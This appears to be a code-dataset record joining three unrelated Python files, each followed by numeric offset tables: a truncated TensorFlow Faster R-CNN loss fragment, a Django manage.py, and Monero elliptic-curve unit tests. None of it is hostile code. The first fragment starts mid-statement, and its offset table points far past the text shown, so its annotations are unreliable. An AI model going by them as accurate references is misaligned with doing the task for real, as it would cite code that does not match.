self.num_classes, mask_height, mask_width])
(nmsed_boxes, nmsed_scores, nmsed_classes, nmsed_masks, _,
num_detections) = self._second_stage_nms_fn(
refined_decoded_boxes_batch,
class_predictions_batch,
clip_window=clip_window,
change_coordinate_frame=True,
num_valid_boxes=num_proposals,
masks=mask_predictions_batch)
detections = {
fields.DetectionResultFields.detection_boxes: nmsed_boxes,
fields.DetectionResultFields.detection_scores: nmsed_scores,
fields.DetectionResultFields.detection_classes: nmsed_classes,
fields.DetectionResultFields.num_detections: tf.to_float(num_detections)
}
if nmsed_masks is not None:
detections[fields.DetectionResultFields.detection_masks] = nmsed_masks
return detections
def _batch_decode_boxes(self, box_encodings, anchor_boxes):
"""Decodes box encodings with respect to the anchor boxes.
Args:
box_encodings: a 4-D tensor with shape
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
representing box encodings.
anchor_boxes: [batch_size, num_anchors, self._box_coder.code_size]
representing decoded bounding boxes. If using a shared box across
classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
Returns:
decoded_boxes: a
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
float tensor representing bounding box predictions (for each image in
batch, proposal and class). If using a shared box across classes the
shape will instead be
[batch_size, num_anchors, 1, self._box_coder.code_size].
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
num_classes = combined_shape[2]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchor_boxes, 2), [1, 1, num_classes, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
return tf.reshape(decoded_boxes.get(),
tf.stack([combined_shape[0], combined_shape[1],
num_classes, 4]))
'''def loss(self, prediction_dict, true_image_shapes, scope=None):
"""Compute scalar loss tensors given prediction tensors.
If number_of_stages=1, only RPN related losses are computed (i.e.,
`rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
losses are computed.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
`image_shape`, and `anchors` fields. Otherwise we expect
prediction_dict to additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`, and
`proposal_boxes` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`, 'second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
(groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
loss_dict = self._loss_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list)
if self._number_of_stages > 1:
loss_dict.update(
self._loss_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
prediction_dict['image_shape'],
prediction_dict.get('mask_predictions'),
groundtruth_masks_list,
))
return loss_dict'''
def loss(self, prediction_dict, true_image_shapes, scope=None):
"""Compute scalar loss tensors given prediction tensors.
If number_of_stages=1, only RPN related losses are computed (i.e.,
`rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
losses are computed.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
documentation for the predict method. If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
`image_shape`, and `anchors` fields. Otherwise we expect
prediction_dict to additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`, and
`proposal_boxes` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`, 'second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
(groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
'''loss_dict = self._loss_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list)'''
#if self._number_of_stages > 1:
# loss_dict.update(
loss_dict = self._loss_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
prediction_dict['image_shape'],
prediction_dict.get('mask_predictions'),
groundtruth_masks_list,
)#)
return loss_dict
def _loss_rpn(self, rpn_box_encodings,
rpn_objectness_predictions_with_background, anchors,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list):
"""Computes scalar RPN loss tensors.
Uses self._proposal_target_assigner to obtain regression and classification
targets for the first stage RPN, samples a "minibatch" of anchors to
participate in the loss computation, and returns the RPN losses.
Args:
rpn_box_encodings: A 4-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
rpn_objectness_predictions_with_background: A 2-D float tensor of shape
[batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
groundtruth_boxlists: A list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`) to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope('RPNLoss'):
(batch_cls_targets, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._proposal_target_assigner,
anchors_batch=box_list.BoxList(anchors),
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=(len(groundtruth_boxlists) * [None]),
gt_weights_batch=groundtruth_weights_list)
batch_cls_targets = tf.squeeze(batch_cls_targets, axis=2)
def _minibatch_subsample_fn(inputs):
cls_targets, cls_weights = inputs
return self._first_stage_sampler.subsample(
tf.cast(cls_weights, tf.bool),
self._first_stage_minibatch_size, tf.cast(cls_targets, tf.bool))
batch_sampled_indices = tf.to_float(shape_utils.static_or_dynamic_map_fn(
_minibatch_subsample_fn,
[batch_cls_targets, batch_cls_weights],
dtype=tf.bool,
parallel_iterations=self._parallel_iterations,
back_prop=True))
# Normalize by number of examples in sampled minibatch
normalizer = tf.reduce_sum(batch_sampled_indices, axis=1)
batch_one_hot_targets = tf.one_hot(
tf.to_int32(batch_cls_targets), depth=2)
sampled_reg_indices = tf.multiply(batch_sampled_indices,
batch_reg_weights)
localization_losses = self._first_stage_localization_loss(
rpn_box_encodings, batch_reg_targets, weights=sampled_reg_indices)
objectness_losses = self._first_stage_objectness_loss(
rpn_objectness_predictions_with_background,
batch_one_hot_targets, weights=batch_sampled_indices)
localization_loss = tf.reduce_mean(
tf.reduce_sum(localization_losses, axis=1) / normalizer)
objectness_loss = tf.reduce_mean(
tf.reduce_sum(objectness_losses, axis=1) / normalizer)
localization_loss = tf.multiply(self._first_stage_loc_loss_weight,
localization_loss,
name='localization_loss')
objectness_loss = tf.multiply(self._first_stage_obj_loss_weight,
objectness_loss, name='objectness_loss')
loss_dict = {localization_loss.op.name: localization_loss,
objectness_loss.op.name: objectness_loss}
return loss_dict
def _loss_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
image_shape,
prediction_masks=None,
groundtruth_masks_list=None):
"""Computes scalar box classifier loss tensors.
Uses self._detector_target_assigner to obtain regression and classification
targets for the second stage box classifier, optionally performs
hard mining, and returns losses. All losses are computed independently
for each image and then averaged across the batch.
Please note that for boxes and masks with multiple labels, the box
regression and mask prediction losses are only computed for one label.
This function assumes that the proposal boxes in the "padded" regions are
actually zero (and thus should not be matched to).
Args:
refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, box_coder.code_size] representing
predicted (final) refined box encodings. If using a shared box across
classes this will instead have shape
[total_num_proposals, 1, box_coder.code_size].
class_predictions_with_background: a 2-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: [batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: a list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: a list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes + 1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
image_shape: a 1-D tensor of shape [4] representing the image shape.
prediction_masks: an optional 4-D tensor with shape [total_num_proposals,
num_classes, mask_height, mask_width] containing the instance masks for
each box.
groundtruth_masks_list: an optional list of 3-D tensors of shape
[num_boxes, image_height, image_width] containing the instance masks for
each of the boxes.
Returns:
a dictionary mapping loss keys ('second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
Raises:
ValueError: if `predict_instance_masks` in
second_stage_mask_rcnn_box_predictor is True and
`groundtruth_masks_list` is not provided.
"""
with tf.name_scope('BoxClassifierLoss'):
paddings_indicator = self._padded_batched_proposals_indicator(
num_proposals, self.max_num_proposals)
proposal_boxlists = [
box_list.BoxList(proposal_boxes_single_image)
for proposal_boxes_single_image in tf.unstack(proposal_boxes)]
batch_size = len(proposal_boxlists)
num_proposals_or_one = tf.to_float(tf.expand_dims(
tf.maximum(num_proposals, tf.ones_like(num_proposals)), 1))
normalizer = tf.tile(num_proposals_or_one,
[1, self.max_num_proposals]) * batch_size
(batch_cls_targets_with_background, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_classes_with_background_list,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
gt_weights_batch=groundtruth_weights_list)
class_predictions_with_background = tf.reshape(
class_predictions_with_background,
[batch_size, self.max_num_proposals, -1])
flat_cls_targets_with_background = tf.reshape(
batch_cls_targets_with_background,
[batch_size * self.max_num_proposals, -1])
one_hot_flat_cls_targets_with_background = tf.argmax(
flat_cls_targets_with_background, axis=1)
one_hot_flat_cls_targets_with_background = tf.one_hot(
one_hot_flat_cls_targets_with_background,
flat_cls_targets_with_background.get_shape()[1])
# If using a shared box across classes use directly
if refined_box_encodings.shape[1] == 1:
reshaped_refined_box_encodings = tf.reshape(
refined_box_encodings,
[batch_size, self.max_num_proposals, self._box_coder.code_size])
# For anchors with multiple labels, picks refined_location_encodings
# for just one class to avoid over-counting for regression loss and
# (optionally) mask loss.
else:
# We only predict refined location encodings for the non background
# classes, but we now pad it to make it compatible with the class
# predictions
refined_box_encodings_with_background = tf.pad(
refined_box_encodings, [[0, 0], [1, 0], [0, 0]])
refined_box_encodings_masked_by_class_targets = tf.boolean_mask(
refined_box_encodings_with_background,
tf.greater(one_hot_flat_cls_targets_with_background, 0))
reshaped_refined_box_encodings = tf.reshape(
refined_box_encodings_masked_by_class_targets,
[batch_size, self.max_num_proposals, self._box_coder.code_size])
second_stage_loc_losses = self._second_stage_localization_loss(
reshaped_refined_box_encodings,
batch_reg_targets, weights=batch_reg_weights) / normalizer
second_stage_cls_losses = ops.reduce_sum_trailing_dimensions(
self._second_stage_classification_loss(
class_predictions_with_background,
batch_cls_targets_with_background,
weights=batch_cls_weights),
ndims=2) / normalizer
second_stage_loc_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_loc_losses, paddings_indicator))
second_stage_cls_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_cls_losses, paddings_indicator))
if self._hard_example_miner:
(second_stage_loc_loss, second_stage_cls_loss
) = self._unpad_proposals_and_apply_hard_mining(
proposal_boxlists, second_stage_loc_losses,
second_stage_cls_losses, num_proposals)
localization_loss = tf.multiply(self._second_stage_loc_loss_weight,
second_stage_loc_loss,
name='localization_loss')
classification_loss = tf.multiply(self._second_stage_cls_loss_weight,
second_stage_cls_loss,
name='classification_loss')
loss_dict = {localization_loss.op.name: localization_loss,
classification_loss.op.name: classification_loss}
second_stage_mask_loss = None
if prediction_masks is not None:
if groundtruth_masks_list is None:
raise ValueError('Groundtruth instance masks not provided. '
'Please configure input reader.')
unmatched_mask_label = tf.zeros(image_shape[1:3], dtype=tf.float32)
(batch_mask_targets, _, _, batch_mask_target_weights,
_) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_masks_list,
unmatched_class_label=unmatched_mask_label,
gt_weights_batch=groundtruth_weights_list)
# Pad the prediction_masks with to add zeros for background class to be
# consistent with class predictions.
if prediction_masks.get_shape().as_list()[1] == 1:
# Class agnostic masks or masks for one-class prediction. Logic for
# both cases is the same since background predictions are ignored
# through the batch_mask_target_weights.
prediction_masks_masked_by_class_targets = prediction_masks
else:
prediction_masks_with_background = tf.pad(
prediction_masks, [[0, 0], [1, 0], [0, 0], [0, 0]])
prediction_masks_masked_by_class_targets = tf.boolean_mask(
prediction_masks_with_background,
tf.greater(one_hot_flat_cls_targets_with_background, 0))
mask_height = prediction_masks.shape[2].value
mask_width = prediction_masks.shape[3].value
reshaped_prediction_masks = tf.reshape(
prediction_masks_masked_by_class_targets,
[batch_size, -1, mask_height * mask_width])
batch_mask_targets_shape = tf.shape(batch_mask_targets)
flat_gt_masks = tf.reshape(batch_mask_targets,
[-1, batch_mask_targets_shape[2],
batch_mask_targets_shape[3]])
# Use normalized proposals to crop mask targets from image masks.
flat_normalized_proposals = box_list_ops.to_normalized_coordinates(
box_list.BoxList(tf.reshape(proposal_boxes, [-1, 4])),
image_shape[1], image_shape[2]).get()
flat_cropped_gt_mask = tf.image.crop_and_resize(
tf.expand_dims(flat_gt_masks, -1),
flat_normalized_proposals,
tf.range(flat_normalized_proposals.shape[0].value),
[mask_height, mask_width])
batch_cropped_gt_mask = tf.reshape(
flat_cropped_gt_mask,
[batch_size, -1, mask_height * mask_width])
second_stage_mask_losses = ops.reduce_sum_trailing_dimensions(
self._second_stage_mask_loss(
reshaped_prediction_masks,
batch_cropped_gt_mask,
weights=batch_mask_target_weights),
ndims=2) / (
mask_height * mask_width * tf.maximum(
tf.reduce_sum(
batch_mask_target_weights, axis=1, keep_dims=True
), tf.ones((batch_size, 1))))
second_stage_mask_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_mask_losses, paddings_indicator))
if second_stage_mask_loss is not None:
mask_loss = tf.multiply(self._second_stage_mask_loss_weight,
second_stage_mask_loss, name='mask_loss')
loss_dict[mask_loss.op.name] = mask_loss
return loss_dict
def _padded_batched_proposals_indicator(self,
num_proposals,
max_num_proposals):
"""Creates indicator matrix of non-pad elements of padded batch proposals.
Args:
num_proposals: Tensor of type tf.int32 with shape [batch_size].
max_num_proposals: Maximum number of proposals per image (integer).
Returns:
A Tensor of type tf.bool with shape [batch_size, max_num_proposals].
"""
batch_size = tf.size(num_proposals)
tiled_num_proposals = tf.tile(
tf.expand_dims(num_proposals, 1), [1, max_num_proposals])
tiled_proposal_index = tf.tile(
tf.expand_dims(tf.range(max_num_proposals), 0), [batch_size, 1])
return tf.greater(tiled_num_proposals, tiled_proposal_index)
def _unpad_proposals_and_apply_hard_mining(self,
proposal_boxlists,
second_stage_loc_losses,
second_stage_cls_losses,
num_proposals):
"""Unpads proposals and applies hard mining.
Args:
proposal_boxlists: A list of `batch_size` BoxLists each representing
`self.max_num_proposals` representing decoded proposal bounding boxes
for each image.
second_stage_loc_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage localization loss values.
second_stage_cls_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage classification loss values.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
Returns:
second_stage_loc_loss: A scalar float32 tensor representing the second
stage localization loss.
second_stage_cls_loss: A scalar float32 tensor representing the second
stage classification loss.
"""
for (proposal_boxlist, single_image_loc_loss, single_image_cls_loss,
single_image_num_proposals) in zip(
proposal_boxlists,
tf.unstack(second_stage_loc_losses),
tf.unstack(second_stage_cls_losses),
tf.unstack(num_proposals)):
proposal_boxlist = box_list.BoxList(
tf.slice(proposal_boxlist.get(),
[0, 0], [single_image_num_proposals, -1]))
single_image_loc_loss = tf.slice(single_image_loc_loss,
[0], [single_image_num_proposals])
single_image_cls_loss = tf.slice(single_image_cls_loss,
[0], [single_image_num_proposals])
return self._hard_example_miner(
location_losses=tf.expand_dims(single_image_loc_loss, 0),
cls_losses=tf.expand_dims(single_image_cls_loss, 0),
decoded_boxlist_list=[proposal_boxlist])
def restore_map(self,
fine_tune_checkpoint_type='detection',
load_all_detection_checkpoint_vars=False):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
fine_tune_checkpoint_type: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Valid values: `detection`, `classification`. Default 'detection'.
load_all_detection_checkpoint_vars: whether to load all variables (when
`fine_tune_checkpoint_type` is `detection`). If False, only variables
within the feature extractor scopes are included. Default False.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
Raises:
ValueError: if fine_tune_checkpoint_type is neither `classification`
nor `detection`.
"""
if fine_tune_checkpoint_type not in ['detection', 'classification']:
raise ValueError('Not supported fine_tune_checkpoint_type: {}'.format(
fine_tune_checkpoint_type))
if fine_tune_checkpoint_type == 'classification':
return self._feature_extractor.restore_from_classification_checkpoint_fn(
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope)
variables_to_restore = tf.global_variables()
variables_to_restore.append(slim.get_or_create_global_step())
# Only load feature extractor variables to be consistent with loading from
# a classification checkpoint.
include_patterns = None
if not load_all_detection_checkpoint_vars:
include_patterns = [
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope
]
feature_extractor_variables = tf.contrib.framework.filter_variables(
variables_to_restore, include_patterns=include_patterns)
return {var.op.name: var for var in feature_extractor_variables}
| [
[
[
5282,
5296
],
[
7243,
7257
],
[
8138,
8152
],
[
9063,
9077
]
],
[
[
5319,
5326
],
[
60781,
60788
]
],
[
[
5334,
5350
],
[
6070,
6072
],
[
8005,
8007
],
[
8890,
8892
],
[
8962,
8964
],
[
9851,
9853
],
[
26852,
26854
],
[
26940,
26942
],
[
27100,
27102
],
[
27112,
27114
],
[
27995,
27997
],
[
28007,
28009
],
[
28017,
28019
],
[
28086,
28088
],
[
32689,
32691
],
[
35360,
35362
],
[
35368,
35370
],
[
44851,
44853
],
[
45029,
45031
],
[
45063,
45065
],
[
45495,
45497
],
[
45597,
45599
],
[
46560,
46562
],
[
48120,
48122
],
[
48276,
48278
],
[
52012,
52014
],
[
52721,
52723
],
[
52772,
52774
],
[
53643,
53645
],
[
54100,
54102
],
[
54715,
54717
],
[
54764,
54766
],
[
54826,
54828
],
[
54838,
54840
],
[
54882,
54884
],
[
54929,
54931
],
[
55978,
55980
],
[
56191,
56193
],
[
56804,
56806
],
[
58619,
58621
],
[
58737,
58739
],
[
58850,
58852
],
[
61761,
61763
],
[
61874,
61876
],
[
63850,
63852
],
[
64508,
64510
],
[
64633,
64635
],
[
65591,
65593
],
[
68139,
68141
],
[
68318,
68320
],
[
68335,
68337
],
[
68553,
68555
],
[
68636,
68638
],
[
68908,
68910
],
[
68957,
68959
],
[
69309,
69311
],
[
70338,
70340
],
[
72868,
72870
],
[
72909,
72911
],
[
72951,
72953
],
[
73934,
73936
],
[
74381,
74383
],
[
74437,
74439
],
[
74495,
74497
],
[
76326,
76328
],
[
76351,
76353
],
[
77119,
77121
],
[
77128,
77130
],
[
77138,
77140
],
[
77157,
77159
],
[
77663,
77665
],
[
77726,
77728
],
[
79197,
79199
],
[
79259,
79261
],
[
79602,
79604
],
[
79613,
79615
],
[
79881,
79883
],
[
79905,
79907
],
[
82024,
82026
],
[
82132,
82134
],
[
84757,
84759
],
[
84970,
84972
],
[
85383,
85385
],
[
85403,
85405
],
[
85809,
85811
],
[
85869,
85871
],
[
86627,
86629
],
[
87855,
87857
],
[
87872,
87874
],
[
87983,
87985
],
[
88076,
88078
],
[
88178,
88180
],
[
88232,
88234
],
[
92305,
92307
],
[
95346,
95348
],
[
95814,
95816
],
[
96140,
96142
],
[
96291,
96293
],
[
96465,
96467
],
[
96540,
96542
],
[
96562,
96564
],
[
96631,
96633
],
[
97073,
97075
],
[
97099,
97101
],
[
97180,
97182
],
[
97206,
97208
],
[
97288,
97290
],
[
97480,
97482
],
[
101077,
101079
],
[
101360,
101362
],
[
101460,
101462
],
[
101472,
101474
],
[
101498,
101500
],
[
101524,
101526
],
[
101577,
101579
],
[
102084,
102086
],
[
102149,
102151
],
[
102259,
102261
],
[
102410,
102412
],
[
102569,
102571
],
[
102681,
102683
],
[
102950,
102952
],
[
103487,
103489
],
[
103612,
103614
],
[
103692,
103694
],
[
103790,
103792
],
[
104441,
104443
],
[
104466,
104468
],
[
104558,
104560
],
[
104583,
104585
],
[
104926,
104928
],
[
105128,
105130
],
[
105724,
105726
],
[
105757,
105759
],
[
106730,
106732
],
[
106857,
106859
],
[
106936,
106938
],
[
107137,
107139
],
[
107295,
107297
],
[
107348,
107350
],
[
107694,
107696
],
[
107814,
107816
],
[
107852,
107854
],
[
107938,
107940
],
[
108062,
108064
],
[
108480,
108482
],
[
108512,
108514
],
[
108624,
108626
],
[
108684,
108686
],
[
108711,
108713
],
[
108840,
108842
],
[
109549,
109551
],
[
109598,
109600
],
[
109615,
109617
],
[
109700,
109702
],
[
109717,
109719
],
[
109732,
109734
],
[
109793,
109795
],
[
111369,
111371
],
[
111419,
111421
],
[
111469,
111471
],
[
111550,
111552
],
[
111675,
111677
],
[
111811,
111813
],
[
111982,
111984
],
[
112045,
112047
],
[
113613,
113615
],
[
114063,
114065
],
[
60789,
60791
],
[
60875,
60877
],
[
81182,
81184
],
[
81219,
81221
],
[
81254,
81256
],
[
81283,
81285
],
[
81309,
81311
],
[
81370,
81372
],
[
81630,
81632
],
[
96002,
96004
],
[
96023,
96025
],
[
96079,
96081
],
[
96100,
96102
]
],
[
[
5358,
5362
]
],
[
[
5370,
5381
]
],
[
[
5430,
5451
],
[
20628,
20649
]
],
[
[
5490,
5511
],
[
22219,
22240
]
],
[
[
5546,
5554
],
[
25771,
25779
],
[
73137,
73145
],
[
76077,
76085
],
[
87957,
87965
],
[
95589,
95597
],
[
101269,
101277
],
[
107677,
107685
],
[
111522,
111530
],
[
44335,
44343
],
[
44669,
44677
],
[
70048,
70056
]
],
[
[
5589,
5601
],
[
56236,
56248
],
[
60591,
60603
],
[
73774,
73786
],
[
76027,
76039
],
[
80160,
80172
],
[
107625,
107637
],
[
44287,
44299
],
[
44621,
44633
],
[
69998,
70010
]
],
[
[
5636,
5649
],
[
48156,
48169
],
[
48312,
48325
],
[
52051,
52064
],
[
53682,
53695
],
[
58654,
58667
],
[
58772,
58785
],
[
64828,
64841
]
],
[
[
5684,
5690
],
[
22930,
22936
],
[
23023,
23029
],
[
23789,
23795
],
[
23955,
23961
]
],
[
[
5725,
5730
],
[
10242,
10247
]
],
[
[
5765,
5780
],
[
68845,
68860
]
],
[
[
5815,
5840
],
[
52486,
52492
],
[
52585,
52591
],
[
54040,
54046
],
[
64297,
64303
],
[
64371,
64377
],
[
64447,
64453
],
[
65512,
65518
],
[
73220,
73226
],
[
74339,
74345
],
[
76234,
76240
],
[
76480,
76486
],
[
76578,
76584
],
[
77339,
77345
],
[
77437,
77443
],
[
86375,
86381
],
[
86442,
86448
],
[
86511,
86517
],
[
86582,
86588
],
[
86710,
86716
]
],
[
[
5875,
5890
],
[
95467,
95482
],
[
101788,
101803
],
[
105845,
105860
]
],
[
[
5926,
5929
],
[
48455,
48458
],
[
104152,
104155
],
[
108200,
108203
],
[
81590,
81593
]
],
[
[
5965,
5976
],
[
26987,
26998
],
[
44917,
44928
],
[
46450,
46461
],
[
61685,
61696
],
[
68213,
68224
],
[
70231,
70242
],
[
81854,
81865
],
[
87724,
87735
],
[
96152,
96163
],
[
60733,
60744
]
],
[
[
5984,
5987
],
[
6000,
6003
]
],
[
[
6052,
6061
],
[
20953,
20962
],
[
21042,
21051
]
],
[
[
6063,
6067
],
[
56427,
56431
],
[
56590,
56594
],
[
82383,
82387
],
[
113667,
113671
]
],
[
[
6094,
6120
]
],
[
[
10212,
10241
],
[
20110,
20139
]
]
] |
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'translate.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
[
[
69,
71
],
[
137,
139
]
],
[
[
79,
82
],
[
593,
596
]
],
[
[
89,
93
],
[
636,
640
]
]
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
import binascii
from binascii import unhexlify
import unittest
import aiounittest
from monero_glue.xmr import common, crypto
from monero_glue.xmr.core import ec_py
class CryptoTest(aiounittest.AsyncTestCase):
"""Simple tests"""
def __init__(self, *args, **kwargs):
super(CryptoTest, self).__init__(*args, **kwargs)
def test_ed_crypto(self):
sqr = ec_py.fe_expmod(ec_py.py_fe_sqrtm1, 2)
self.assertEqual(sqr, ec_py.fe_mod(-1))
self.assertEqual(
ec_py.py_fe_A, ec_py.fe_mod(2 * (1 - ec_py.d) * ec_py.inv(1 + ec_py.py_d))
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb1, 2),
ec_py.fe_mod(-2 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb2, 2),
ec_py.fe_mod(2 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb3, 2),
ec_py.fe_mod(-ec_py.py_fe_sqrtm1 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb4, 2),
ec_py.fe_mod(ec_py.py_fe_sqrtm1 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
def test_encoding(self):
point = unhexlify(
b"2486224797d05cae3cba4be043be2db0df381f3f19cfa113f86ab38e3d8d2bd0"
)
self.assertEqual(point, crypto.encodepoint(crypto.decodepoint(point)))
self.assertTrue(
crypto.point_eq(
crypto.decodepoint(point),
crypto.decodepoint(crypto.encodepoint(crypto.decodepoint(point))),
)
)
def test_scalarmult_base(self):
scalar = crypto.decodeint(
unhexlify(
b"a0eea49140a3b036da30eacf64bd9d56ce3ef68ba82ef13571ec511edbcf8303"
)
)
exp = unhexlify(
b"16bb4a3c44e2ced511fc0d4cd86b13b3af21efc99fb0356199fac489f2544c09"
)
res = crypto.scalarmult_base(scalar)
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
scalar = crypto.decodeint(
unhexlify(
b"fd290dce39f781aebbdbd24584ed6d48bd300de19d9c3decfda0a6e2c6751d0f"
)
)
exp = unhexlify(
b"123daf90fc26f13c6529e6b49bfed498995ac383ef19c0db6771143f24ba8dd5"
)
res = crypto.scalarmult_base(scalar)
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
def test_scalarmult(self):
priv = unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
pub = unhexlify(
b"2486224797d05cae3cba4be043be2db0df381f3f19cfa113f86ab38e3d8d2bd0"
)
exp = unhexlify(
b"adcd1f5881f46f254900a03c654e71950a88a0236fa0a3a946c9b8daed6ef43d"
)
res = crypto.scalarmult(crypto.decodepoint(pub), crypto.decodeint(priv))
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
